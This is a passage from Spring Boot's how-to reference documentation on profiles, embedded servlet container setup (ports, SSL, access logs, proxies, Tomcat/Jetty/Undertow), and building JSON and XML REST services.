E.g.\nlaunch your application with a `-D` argument (remember to put it before the main class\nor jar archive):\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot you can also set the active profile in `application.properties`, e.g.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting,\nbut not by the `SpringApplicationBuilder.profiles()` method. Thus the latter Java API can\nbe used to augment the profiles without changing the defaults.\n\nSee _<<spring-boot-features.adoc#boot-features-profiles>>_ in\nthe '`Spring Boot features`' section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change configuration depending on the environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each\ndocument is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value\n(comma-separated list of profiles) is fed into the Spring\n`Environment.acceptsProfiles()` and if any of those profiles is active that document is\nincluded in the final merge (otherwise not).\n\nExample:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn this example the default port is 9000, but if the Spring profile '`development`' is\nactive then the port is 9001, and if '`production`' is active then it is 0.\n\nThe YAML documents are merged in the order they are encountered (so later values override\nearlier ones).\n\nTo do the same thing with properties files you can use `application-${profile}.properties`\nto specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover built-in options for external properties\nSpring Boot binds external properties from `application.properties` (or `.yml`) (and\nother places) into an application at runtime. There is not (and technically cannot be)\nan exhaustive list of all supported properties in a single location because contributions\ncan come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows\nall the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties#common-application-properties,\n`application.properties`>> example with a list of the most common properties supported by\nSpring Boot. The definitive list comes from searching the source code for\n`@ConfigurationProperties` and `@Value` annotations, as well as the occasional use of\n`RelaxedPropertyResolver`.\n\n\n\n[[howto-embedded-servlet-containers]]\n== Embedded servlet containers\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter or Listener to an application\nThere are two ways to add `Servlet`, `Filter`, `ServletContextListener` and the other\nlisteners supported by the Servlet spec to your application. 
You can either provide\nSpring beans for them, or enable scanning for Servlet components.\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter or Listener using a Spring bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` provide a `@Bean` definition for it.\nThis can be very useful when you want to inject configuration or dependencies. However,\nyou must be very careful that they don't cause eager initialization of too many other\nbeans because they have to be installed in the container very early in the application\nlifecycle (e.g. it's not a good idea to have them depend on your `DataSource` or JPA\nconfiguration). You can work around restrictions like that by initializing them lazily\nwhen first used instead of on initialization.\n\nIn the case of `Filters` and `Servlets` you can also add mappings and init parameters by\nadding a `FilterRegistrationBean` or `ServletRegistrationBean` instead of or as well as\nthe underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, it will match\n`FORWARD`,`INCLUDE` and `REQUEST`. If async has been enabled, it will match `ASYNC` as\nwell.\n\nIf you are migrating a filter that has no `dispatcher` element in `web.xml` you will\nneed to specify a `dispatcherType` yourself:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean myFilterRegistration() {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean();\n\t\tregistration.setDispatcherTypes(DispatcherType.REQUEST);\n\t\t....\n\n\t\treturn registration;\n\t}\n----\n====\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described above>> any `Servlet`\nor `Filter` beans will be registered with the servlet container automatically. To disable\nregistration of a particular `Filter` or `Servlet` bean create a registration bean for it\nand mark it as disabled. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners using classpath scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically\nregistered with an embedded servlet container by annotating a `@Configuration` class\nwith `@ServletComponentScan` and specifying the package(s) containing the components\nthat you want to register. By default, `@ServletComponentScan` will scan from the package\nof the annotated class.\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP port\nIn a standalone application the main HTTP port defaults to `8080`, but can be set with\n`server.port` (e.g. in `application.properties` or as a System property). Thanks to\nrelaxed binding of `Environment` values you can also use `SERVER_PORT` (e.g. 
as an OS\nenvironment variable).\n\nTo switch off the HTTP endpoints completely, but still create a `WebApplicationContext`,\nuse `server.port=-1` (this is sometimes useful for testing).\n\nFor more details look at _<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>_\nin the '`Spring Boot features`' section, or the\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`] source\ncode.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a random unassigned HTTP port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP port at runtime\nYou can access the port the server is running on from log output or from the\n`EmbeddedWebApplicationContext` via its `EmbeddedServletContainer`. The best way to get\nthat and be sure that it has initialized is to add a `@Bean` of type\n`ApplicationListener<EmbeddedServletContainerInitializedEvent>` and pull the container\nout of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can\nalso inject the actual port into a field using the `@LocalServerPort` annotation. For\nexample:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tEmbeddedWebApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`. Don't try\nto inject the port in a regular application. As we just saw, the value is only set once\nthe container has initialized; contrary to a test, application code callbacks are\nprocessed early (i.e. before the value is actually available).\n====\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties,\ntypically in `application.properties` or `application.yml`. For example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {sc-spring-boot}\/context\/embedded\/Ssl.{sc-ext}[`Ssl`] for details of all of the\nsupported properties.\n\nUsing configuration like the example above means the application will no longer support\nplain HTTP connector at port 8080. Spring Boot doesn't support the configuration of both\nan HTTP connector and an HTTPS connector via `application.properties`. If you want to\nhave both then you'll need to configure one of them programmatically. It's recommended\nto use `application.properties` to configure HTTPS as the HTTP connector is the easier of\nthe two to configure programmatically. 
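\n\nAs a rough sketch (imports omitted, and assuming the `+server.ssl.*+` properties above\ncontinue to drive the main connector), an additional plain HTTP connector could be added\nlike this:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory tomcat = new TomcatEmbeddedServletContainerFactory();\n\t\t\/\/ Plain HTTP on 8080 alongside the HTTPS connector configured via properties\n\t\tConnector http = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\thttp.setPort(8080);\n\t\ttomcat.addAdditionalTomcatConnectors(http);\n\t\treturn tomcat;\n\t}\n----\n\n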
See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-tomcat-multi-connectors[`spring-boot-sample-tomcat-multi-connectors`]\nsample project for an example.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat and Undertow via their respective namespaces.\n\nFor instance, the following logs access on Tomcat with a\nhttps:\/\/tomcat.apache.org\/tomcat-8.0-doc\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the tomcat base dir\nand said directory is a temp directory by default so you may want to fix Tomcat's base\ndirectory or use an absolute path for the logs. In the example above, the logs will\nbe available in `my-tomcat\/logs` relative to the working directory of the application.\n\nAccess logging for undertow can be configured in a similar fashion\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the\napplication. This can be customized via `server.undertow.accesslog.directory`.\n\n\n\n[[howto-use-behind-a-proxy-server]]\n[[howto-use-tomcat-behind-a-proxy-server]]\n=== Use behind a front-end proxy server\nYour application might need to send `302` redirects or render content with absolute links\nback to itself. When running behind a proxy, the caller wants a link to the proxy, and not\nto the physical address of the machine hosting your app. Typically such situations are\nhandled via a contract with the proxy, which will add headers to tell the back end how to\nconstruct links to itself.\n\nIf the proxy adds conventional `X-Forwarded-For` and `X-Forwarded-Proto` headers (most do\nthis out of the box) the absolute links should be rendered correctly as long as\n`server.use-forward-headers` is set to `true` in your `application.properties`.\n\nNOTE: If your application is running in Cloud Foundry or Heroku the\n`server.use-forward-headers` property will default to `true` if not specified. In all\nother instances it defaults to `false`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's proxy configuration\nIf you are using Tomcat you can additionally configure the names of the headers used to\ncarry \"`forwarded`\" information:\n\n[indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal\nproxies that are to be trusted. By default, IP addresses in `10\/8`, `192.168\/16`,\n`169.254\/16` and `127\/8` are trusted. You can customize the valve's configuration by\nadding an entry to `application.properties`, e.g.\n\n[indent=0]\n----\n\tserver.tomcat.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are only required when you're using a properties file for\nconfiguration. 
If you are using YAML, single backslashes are sufficient and a value\nthat's equivalent to the one shown above would be `192\.168\.\d{1,3}\.\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but don't do\nthis in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by\nswitching the automatic one off (i.e. set `server.use-forward-headers=false`) and adding\na new valve instance in a `TomcatEmbeddedServletContainerFactory` bean.\n\n\n\n[[howto-configure-tomcat]]\n=== Configure Tomcat\nGenerally you can follow the advice from\n_<<howto-discover-build-in-options-for-external-properties>>_ about\n`@ConfigurationProperties` (`ServerProperties` is the main one here), but also look at\n`EmbeddedServletContainerCustomizer` and various Tomcat-specific `+*Customizers+` that you\ncan add in one of those. The Tomcat APIs are quite rich so once you have access to the\n`TomcatEmbeddedServletContainerFactory` you can modify it in a number of ways. Or the\nnuclear option is to add your own `TomcatEmbeddedServletContainerFactory`.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nAdd an `org.apache.catalina.connector.Connector` to the\n`TomcatEmbeddedServletContainerFactory`, which allows multiple connectors, e.g. an HTTP\nand an HTTPS connector:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory tomcat = new TomcatEmbeddedServletContainerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\t\/\/ this example reuses the same classpath resource as both key store\n\t\t\t\/\/ and trust store; point these at separate files if yours differ\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + \"keystore\"\n\t\t\t\t\t+ \"] or truststore: [\" + \"keystore\" + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nThe embedded Tomcat used by Spring Boot does not support \"Version 0\" of the Cookie\nformat out of the box, and you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values\ncompliant with later Cookie specifications. If, however, you're unable to change the\nway that cookies are written, you can instead configure Tomcat to use a\n`LegacyCookieProcessor`. To switch to the `LegacyCookieProcessor` use an\n`EmbeddedServletContainerCustomizer` bean that adds a `TomcatContextCustomizer`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/embedded\/TomcatLegacyCookieProcessorExample.java[tag=customizer]\n----\n
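\nIf that included example is not to hand, the customizer boils down to something like the\nfollowing sketch (the bean name and the use of anonymous classes are illustrative):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerCustomizer cookieProcessorCustomizer() {\n\t\treturn new EmbeddedServletContainerCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(ConfigurableEmbeddedServletContainer container) {\n\t\t\t\tif (container instanceof TomcatEmbeddedServletContainerFactory) {\n\t\t\t\t\t((TomcatEmbeddedServletContainerFactory) container)\n\t\t\t\t\t\t\t.addContextCustomizers(new TomcatContextCustomizer() {\n\n\t\t\t\t\t\t\t\t@Override\n\t\t\t\t\t\t\t\tpublic void customize(Context context) {\n\t\t\t\t\t\t\t\t\t\/\/ fall back to the pre-RFC 6265 cookie parsing\n\t\t\t\t\t\t\t\t\tcontext.setCookieProcessor(new LegacyCookieProcessor());\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t});\n\t\t\t\t}\n\t\t\t}\n\n\t\t};\n\t}\n----\n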
\n\n\n[[howto-use-jetty-instead-of-tomcat]]\n=== Use Jetty instead of Tomcat\nThe Spring Boot starters (`spring-boot-starter-web` in particular) use Tomcat as an\nembedded container by default. You need to exclude those dependencies and include the\nJetty one instead. Spring Boot provides Tomcat and Jetty dependencies bundled together\nas separate starters to help make this process as easy as possible.\n\nExample in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nExample in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"spring-boot-starter-tomcat\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-web:{spring-boot-version}\")\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-jetty:{spring-boot-version}\")\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[howto-configure-jetty]]\n=== Configure Jetty\nGenerally you can follow the advice from\n_<<howto-discover-build-in-options-for-external-properties>>_ about\n`@ConfigurationProperties` (`ServerProperties` is the main one here), but also look at\n`EmbeddedServletContainerCustomizer`. The Jetty APIs are quite rich so once you have\naccess to the `JettyEmbeddedServletContainerFactory` you can modify it in a number\nof ways. Or the nuclear option is to add your own `JettyEmbeddedServletContainerFactory`.\n\n\n\n[[howto-use-undertow-instead-of-tomcat]]\n=== Use Undertow instead of Tomcat\nUsing Undertow instead of Tomcat is very similar to <<howto-use-jetty-instead-of-tomcat,\nusing Jetty instead of Tomcat>>. 
You need to exclude the Tomcat dependencies and include\nthe Undertow starter instead.\n\nExample in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-undertow<\/artifactId>\n\t<\/dependency>\n----\n\nExample in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"spring-boot-starter-tomcat\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-web:{spring-boot-version}\")\n\t\tcompile(\"org.springframework.boot:spring-boot-starter-undertow:{spring-boot-version}\")\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[howto-configure-undertow]]\n=== Configure Undertow\nGenerally you can follow the advice from\n_<<howto-discover-build-in-options-for-external-properties>>_ about\n`@ConfigurationProperties` (`ServerProperties` and `ServerProperties.Undertow` are the\nmain ones here), but also look at\n`EmbeddedServletContainerCustomizer`. Once you have access to the\n`UndertowEmbeddedServletContainerFactory` you can use an `UndertowBuilderCustomizer` to\nmodify Undertow's configuration to meet your needs. Or the nuclear option is to add your\nown `UndertowEmbeddedServletContainerFactory`.\n\n\n\n[[howto-enable-multiple-listeners-in-undertow]]\n=== Enable Multiple Listeners with Undertow\nAdd an `UndertowBuilderCustomizer` to the `UndertowEmbeddedServletContainerFactory` and\nadd a listener to the `Builder`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic UndertowEmbeddedServletContainerFactory embeddedServletContainerFactory() {\n\t\tUndertowEmbeddedServletContainerFactory factory = new UndertowEmbeddedServletContainerFactory();\n\t\tfactory.addBuilderCustomizers(new UndertowBuilderCustomizer() {\n\n\t\t\t@Override\n\t\t\tpublic void customize(Builder builder) {\n\t\t\t\tbuilder.addHttpListener(8080, \"0.0.0.0\");\n\t\t\t}\n\n\t\t});\n\t\treturn factory;\n\t}\n----\n\n\n\n[[howto-use-tomcat-7]]\n=== Use Tomcat 7.x or 8.0\nTomcat 7 & 8.0 work with Spring Boot, but the default is to use Tomcat 8.5. If you cannot\nuse Tomcat 8.5 (for example, because you are using Java 1.6) you will need to change your\nclasspath to reference a different version.\n\n\n\n[[howto-use-tomcat-7-maven]]\n==== Use Tomcat 7.x or 8.0 with Maven\nIf you are using the starters and parent you can change the Tomcat version property\nand additionally import `tomcat-juli`. E.g. 
for a simple webapp or service:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<tomcat.version>7.0.59<\/tomcat.version>\n\t<\/properties>\n\t<dependencies>\n\t\t...\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.apache.tomcat<\/groupId>\n\t\t\t<artifactId>tomcat-juli<\/artifactId>\n\t\t\t<version>${tomcat.version}<\/version>\n\t\t<\/dependency>\n\t\t...\n\t<\/dependencies>\n----\n\n\n\n[[howto-use-tomcat-7-gradle]]\n==== Use Tomcat 7.x or 8.0 with Gradle\nWith Gradle, you can change the Tomcat version by setting the `tomcat.version` property\nand then additionally include `tomcat-juli`:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\text['tomcat.version'] = '7.0.59'\n\tdependencies {\n\t\tcompile 'org.springframework.boot:spring-boot-starter-web'\n\t\tcompile group:'org.apache.tomcat', name:'tomcat-juli', version:property('tomcat.version')\n\t}\n----\n\n\n\n[[howto-use-jetty-9.2]]\n=== Use Jetty 9.2\nJetty 9.2 works with Spring Boot, but the default is to use Jetty 9.3. If you cannot use\nJetty 9.3 (for example, because you are using Java 7) you will need to change your\nclasspath to reference Jetty 9.2.\n\n\n\n[[howto-use-jetty-9.2-maven]]\n==== Use Jetty 9.2 with Maven\n\nIf you are using the starters and parent you can just add the Jetty starter and override\nthe `jetty.version` property:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<jetty.version>9.2.17.v20160517<\/jetty.version>\n\t<\/properties>\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t\t<exclusions>\n\t\t\t\t<exclusion>\n\t\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t\t<\/exclusion>\n\t\t\t<\/exclusions>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t\t<\/dependency>\n\t<\/dependencies>\n----\n\n\n\n[[howto-use-jetty-9.2-gradle]]\n==== Use Jetty 9.2 with Gradle\n\nYou can set the `jetty.version` property. For example, for a simple webapp or service:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\text['jetty.version'] = '9.2.17.v20160517'\n\tdependencies {\n\t\tcompile ('org.springframework.boot:spring-boot-starter-web') {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-tomcat'\n\t\t}\n\t\tcompile ('org.springframework.boot:spring-boot-starter-jetty')\n\t}\n----\n\n\n\n[[howto-use-jetty-8]]\n=== Use Jetty 8\nJetty 8 works with Spring Boot, but the default is to use Jetty 9.3. If you cannot use\nJetty 9.3 (for example, because you are using Java 1.6) you will need to change your\nclasspath to reference Jetty 8. You will also need to exclude Jetty's WebSocket-related\ndependencies.\n\n\n\n[[howto-use-jetty-8-maven]]\n==== Use Jetty 8 with Maven\n\nIf you are using the starters and parent you can just add the Jetty starter with\nthe required WebSocket exclusion and change the version properties, e.g. 
for a simple\nwebapp or service:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<jetty.version>8.1.15.v20140411<\/jetty.version>\n\t\t<jetty-jsp.version>2.2.0.v201112011158<\/jetty-jsp.version>\n\t<\/properties>\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t\t<exclusions>\n\t\t\t\t<exclusion>\n\t\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t\t<\/exclusion>\n\t\t\t<\/exclusions>\n\t\t<\/dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t\t\t<exclusions>\n\t\t\t\t<exclusion>\n\t\t\t\t\t<groupId>org.eclipse.jetty.websocket<\/groupId>\n\t\t\t\t\t<artifactId>*<\/artifactId>\n\t\t\t\t<\/exclusion>\n\t\t\t<\/exclusions>\n\t\t<\/dependency>\n\t<\/dependencies>\n----\n\n\n\n[[howto-use-jetty-8-gradle]]\n==== Use Jetty 8 with Gradle\n\nYou can set the `jetty.version` property and exclude the WebSocket dependency, e.g. for a\nsimple webapp or service:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\text['jetty.version'] = '8.1.15.v20140411'\n\tdependencies {\n\t\tcompile ('org.springframework.boot:spring-boot-starter-web') {\n\t\t\texclude group: 'org.springframework.boot', module: 'spring-boot-starter-tomcat'\n\t\t}\n\t\tcompile ('org.springframework.boot:spring-boot-starter-jetty') {\n\t\t\texclude group: 'org.eclipse.jetty.websocket'\n\t\t}\n\t}\n----\n\n\n\n[[howto-create-websocket-endpoints-using-serverendpoint]]\n=== Create WebSocket endpoints using @ServerEndpoint\nIf you want to use `@ServerEndpoint` in a Spring Boot application that uses an embedded\ncontainer, you must declare a single `ServerEndpointExporter` `@Bean`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServerEndpointExporter serverEndpointExporter() {\n\t\treturn new ServerEndpointExporter();\n\t}\n----\n\nThis bean will register any `@ServerEndpoint` annotated beans with the underlying\nWebSocket container. When deployed to a standalone servlet container this role is\nperformed by a servlet container initializer and the `ServerEndpointExporter` bean is\nnot required.\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP response compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow. It can be enabled\nvia `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be\nperformed. This can be configured using the `server.compression.min-response-size`\nproperty.\n\nBy default, responses will only be compressed if their content type is one of the\nfollowing:\n\n - `text\/html`\n - `text\/xml`\n - `text\/plain`\n - `text\/css`\n\nThis can be configured using the `server.compression.mime-types` property.\n\n\n\n[[howto-spring-mvc]]\n== Spring MVC\n\n\n\n[[howto-write-a-json-rest-service]]\n=== Write a JSON REST service\nAny Spring `@RestController` in a Spring Boot application should render JSON responses by\ndefault as long as Jackson2 is on the classpath. 
For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RestController\n\tpublic class MyController {\n\n\t\t@RequestMapping(\"\/thing\")\n\t\tpublic MyThing thing() {\n\t\t\treturn new MyThing();\n\t\t}\n\n\t}\n----\n\nAs long as `MyThing` can be serialized by Jackson2 (e.g. a normal POJO or Groovy object)\nthen `http:\/\/localhost:8080\/thing` will serve a JSON representation of it by default.\nSometimes in a browser you might see XML responses because browsers tend to send accept\nheaders that prefer XML.\n\n\n\n[[howto-write-an-xml-rest-service]]\n=== Write an XML REST service\nIf you have the Jackson XML extension (`jackson-dataformat-xml`) on the classpath, it will\nbe used to render XML responses and the very same example as we used for JSON would work.\nTo use it, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nYou may also want to add a dependency on Woodstox. It's faster than the default StAX\nimplementation provided by the JDK and also adds pretty print support and improved\nnamespace handling:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.codehaus.woodstox<\/groupId>\n\t\t<artifactId>woodstox-core-asl<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available, JAXB (provided by default in the JDK) will\nbe used, with the additional requirement to have `MyThing` annotated as\n`@XmlRootElement`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nTo get the server to render XML instead of JSON you might have to send an\n`Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content\nconversion in an HTTP exchange. If Jackson is on the classpath you already get the\ndefault converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which\nis auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for the Jackson XML converter) instance created by default\nhas the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n\nSpring Boot also has some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and 